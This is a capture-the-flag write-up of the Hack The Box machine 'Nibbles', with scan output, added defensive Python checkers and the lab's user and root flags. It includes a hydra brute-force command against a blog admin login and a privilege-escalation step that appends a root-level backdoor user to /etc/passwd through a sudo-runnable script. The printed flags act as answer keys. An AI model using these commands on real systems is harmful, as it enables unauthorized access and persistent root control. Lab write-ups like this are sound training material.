Nibbles - 18.08.2021


NMap

┌──(kali㉿kali)-[~/htb/nibbles]
└─$ nmap -sC -sV -T4 -p- 10.10.10.75
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-18 14:20 CEST
Warning: 10.10.10.75 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.75
Host is up (0.054s latency).
Not shown: 65394 closed ports, 139 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nikto

┌──(kali㉿kali)-[~/htb/nibbles]
└─$ nikto -h 10.10.10.75 -C all
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.75
+ Target Hostname:    10.10.10.75
+ Target Port:        80
+ Start Time:         2021-08-18 14:22:35 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /, inode: 5d, size: 5616c3cf7fa77, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 26470 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2021-08-18 14:51:51 (GMT2) (1756 seconds)

Version: v4.0.3
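The three missing-header findings, the ETag finding and the Server banner Nikto reported above are all visible in a single HTTP response, so they can be re-checked without Nikto. The following is an added example, not part of the original notes: a small audit over a response's header dictionary. The sample headers are constructed; the ETag value is reassembled from the fields Nikto printed (it splits the tag on "-") and is an assumption, and the hardened set assumes the recommended headers were added plus `ServerTokens Prod` and `FileETag None` in Apache.

```python
"""Added example (not from the original writeup): audit an HTTP response's headers
for the issues Nikto flagged. All sample data below is constructed; nothing here
contacts a host."""
import re

# Headers Nikto reported as absent, with the value a hardened Apache would send.
RECOMMENDED_HEADERS = {
    "X-Frame-Options": "SAMEORIGIN",
    "X-Content-Type-Options": "nosniff",
    "X-XSS-Protection": "1; mode=block",  # legacy; modern browsers rely on CSP instead
}

# Apache's default ETag shape: hex fields joined by '-', optionally followed by '-gzip'.
APACHE_ETAG_RE = re.compile(r'^"?[0-9a-f]+-[0-9a-f]+(-[0-9a-f]+)?(-gzip)?"?$', re.IGNORECASE)


def _normalize(headers):
    """Header names are case-insensitive; compare on lower-case keys."""
    return {k.lower(): v for k, v in headers.items()}


def missing_security_headers(headers):
    """Return the recommended headers (in RECOMMENDED_HEADERS order) that are absent."""
    present = _normalize(headers)
    return [name for name in RECOMMENDED_HEADERS if name.lower() not in present]


def etag_looks_like_apache_default(headers):
    """True if the ETag follows Apache's default size/mtime(/inode) format,
    which is what Nikto's 'may leak inodes' finding keys on."""
    etag = _normalize(headers).get("etag")
    return bool(etag and APACHE_ETAG_RE.match(etag.strip()))


def server_version_disclosed(headers):
    """True if the Server header carries a version number (e.g. 'Apache/2.4.18')."""
    server = _normalize(headers).get("server", "")
    return bool(re.search(r"/\d", server))


def audit_response_headers(headers):
    """Combine the checks into one findings dict."""
    return {
        "missing": missing_security_headers(headers),
        "etag_leak": etag_looks_like_apache_default(headers),
        "server_version_disclosed": server_version_disclosed(headers),
    }


# Constructed sample: what the target's response plausibly looked like (ETag reassembled
# from Nikto's fields, an assumption).
SAMPLE_RESPONSE_HEADERS = {
    "Server": "Apache/2.4.18 (Ubuntu)",
    "Content-Type": "text/html",
    "ETag": '"5d-5616c3cf7fa77-gzip"',
}

# Constructed sample: the same response after adding the recommended headers and
# configuring ServerTokens Prod / FileETag None (assumed Apache hardening).
HARDENED_RESPONSE_HEADERS = {
    "Server": "Apache",
    "Content-Type": "text/html",
    **RECOMMENDED_HEADERS,
}

if __name__ == "__main__":
    print(audit_response_headers(SAMPLE_RESPONSE_HEADERS))
    print(audit_response_headers(HARDENED_RESPONSE_HEADERS))
```

Run against a live response by passing `dict(resp.headers)` from any HTTP client; the sample dicts only show which findings appear before and after hardening.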


SearchSploit


User

admin


SSH Enum


SSH Crack

Unsuccessful - the connection got blocked and there are false positives

hydra -l admin -P /usr/share/wordlists/rockyou.txt  10.10.10.75 -V http-form-post '/nibbleblog/admin.php:username=^USER^&password=^PASS^:F=Incorrect'

Trying creds admin:nibbles succeeded


Upload shell

user.txt

540e8442702197becaef617c7411eb0a


Privilege Escalation

Suspicious file: personal.zip

Helpful line

/usr/bin/script -qc /bin/bash /dev/null

Since sudo can be used to run monitor.sh, the script's code can be modified to, e.g.:

echo mati1:pATfNCwRanDjY:0:0:mati1:/home/mati1:/bin/bash >> /etc/passwd

This adds a new user with administrator privileges:

mati1:password

Running such a script then executes the command:

sudo ./monitor.sh

/etc/passwd

...
mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false
nibbler:x:1001:1001::/home/nibbler:
mati1:pATfNCwRanDjY:0:0:mati1:/home/mati1:/bin/bash
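The escalation above leaves two artefacts a defender can look for: a script that the sudo rule allows but that its invoking user can rewrite, and an /etc/passwd entry with UID 0 and a hash sitting directly in the password field. The following is an added example, not part of the original notes: a checker for both. The passwd lines are constructed from the excerpt above, and the stat values fed to the sudo-script check are constructed too (the ownership and mode of monitor.sh on the box are not stated on this page), so nothing touches the real system.

```python
"""Added example (not from the original writeup): flag a UID-0 backdoor entry in
/etc/passwd and a sudo-permitted script the caller can tamper with. Sample data
is constructed."""
import os
import stat


def parse_passwd(lines):
    """Yield dicts for well-formed passwd lines; skip blanks, comments and truncated rows."""
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        yield {"name": name, "pw": pw, "uid": uid, "gid": gid, "home": home, "shell": shell}


def suspicious_passwd_entries(lines):
    """Return (name, reasons) for entries that are UID 0 but not root, or that carry a
    real hash in the password field (such a hash bypasses /etc/shadow and is usable
    for login)."""
    findings = []
    for e in parse_passwd(lines):
        reasons = []
        if e["uid"] == "0" and e["name"] != "root":
            reasons.append("uid 0 but not root")
        if e["pw"] not in ("x", "*", "!", ""):
            reasons.append("password hash stored in /etc/passwd")
        if reasons:
            findings.append((e["name"], reasons))
    return findings


def sudo_script_is_tamperable(st_mode, st_uid, st_gid, caller_uid, caller_gid):
    """A script allowed by a sudo rule is tamperable when the non-root caller can write it:
    caller owns it with owner-write, shares its group with group-write, or it is
    world-writable."""
    if caller_uid == 0:
        return False
    if st_uid == caller_uid and st_mode & stat.S_IWUSR:
        return True
    if st_gid == caller_gid and st_mode & stat.S_IWGRP:
        return True
    return bool(st_mode & stat.S_IWOTH)


def check_sudo_script(path, caller_uid=None, caller_gid=None):
    """Convenience wrapper: stat a real path and evaluate it for the current user."""
    st = os.stat(path)
    caller_uid = os.getuid() if caller_uid is None else caller_uid
    caller_gid = os.getgid() if caller_gid is None else caller_gid
    return sudo_script_is_tamperable(st.st_mode, st.st_uid, st.st_gid, caller_uid, caller_gid)


# Constructed sample modelled on the /etc/passwd excerpt above (root line assumed).
SAMPLE_PASSWD = [
    "root:x:0:0:root:/root:/bin/bash",
    "mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false",
    "nibbler:x:1001:1001::/home/nibbler:",
    "mati1:pATfNCwRanDjY:0:0:mati1:/home/mati1:/bin/bash",
]

if __name__ == "__main__":
    print(suspicious_passwd_entries(SAMPLE_PASSWD))
    # Constructed stat values: a 0755 script owned by uid/gid 1001, run via sudo by 1001.
    print(sudo_script_is_tamperable(0o755, 1001, 1001, 1001, 1001))
    # Same mode but root-owned: the caller cannot rewrite it.
    print(sudo_script_is_tamperable(0o755, 0, 0, 1001, 1001))
```

On a real host, read /etc/passwd into `suspicious_passwd_entries` and call `check_sudo_script` on each command path listed by `sudo -l`; a sudo rule pointing at a caller-writable script is equivalent to unrestricted root.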

root.txt

b5510bc4e42863bddf68f2a7b0ee935e